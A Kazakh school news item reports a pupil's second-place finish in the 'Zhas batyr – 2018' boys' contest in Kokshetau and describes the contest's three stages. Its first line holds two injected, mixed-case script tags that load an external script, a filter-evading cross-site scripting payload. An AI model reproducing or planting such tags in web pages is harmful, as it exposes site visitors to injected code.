<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.03.2018

«Жас батыр – 2018»

Көкшетау қаласында  28 – ақпан күні  облыстық «Көкшетау» мәдениет сарайында  Астана  қаласының 20 жылдық мерей той шеңберінде, қазақ халқының балуаны  Қажымұқан Мұңайтпасовтың  туғанына 135 жыл толуына арналған « Жас батыр -2018»  ер балалар сайысы өтті. Сайыстың мақсаты:

56 медаль олжаланған Қажымұқан Мұңайтпасовтың  қаһармандығын насихаттап, моральдық-патриоттық сезімді қалыптастыру.

          Байқау  үш кезеңнен тұрды:

1.Таныстыру. «Батырдан сәлем» 2-3минут

2. «Қажымұқан – менің қаһарманым» -  таңдаған спорт түрін демонстрациялық көрсету. 2-3 минут

3. « Астана – менің шабытым» шығармашылық кезеңі (ән, би, күй,.т.б.) 2-3 минут.

«Жас батыр» қалалық  сайысына қатысқан қала мектептер арасында  №17 орта мектеп – гимназиясының   5 «А» сынып оқушысы  Таймыс Сандияр  ерекше өнер көрсеткені үшін  жүлделі  ІІ орынды  иеленіп , жеңіске жетті. Сандиярды жеңісімен құттықтаймыз! Әрқашан биік белестерден көріне берсін.  Сандиярға зор табыс тілей отыра  жетекші мұғалімі  Жазиева  Айнагүл Сабырбекқызы екеуін  жеңістерімен құттықтаймыз! 

Просмотров: 675


Пікір қосу



Деректерді қолтаңбаға қосу